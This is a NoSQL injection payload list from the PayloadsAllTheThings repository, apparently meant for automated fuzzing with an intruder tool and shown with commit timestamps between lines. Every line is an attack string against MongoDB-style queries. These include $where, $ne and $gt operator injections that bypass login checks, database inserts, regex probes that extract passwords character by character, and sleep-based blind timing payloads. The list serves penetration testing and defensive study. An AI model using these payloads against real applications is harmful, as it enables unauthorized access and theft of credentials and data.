PayloadsAllTheThings/NoSQL Injection/Intruder/NoSQL.txt

23 lines
611 B
Plaintext
Raw Normal View History

2017-07-30 11:42:32 +00:00
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
2021-05-29 10:04:13 +00:00
{"$gt": ""}
2017-07-30 11:42:32 +00:00
[$ne]=1
';sleep(5000);
';sleep(5000);'
2018-01-26 12:31:52 +00:00
';sleep(5000);+'
2017-07-30 11:42:32 +00:00
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);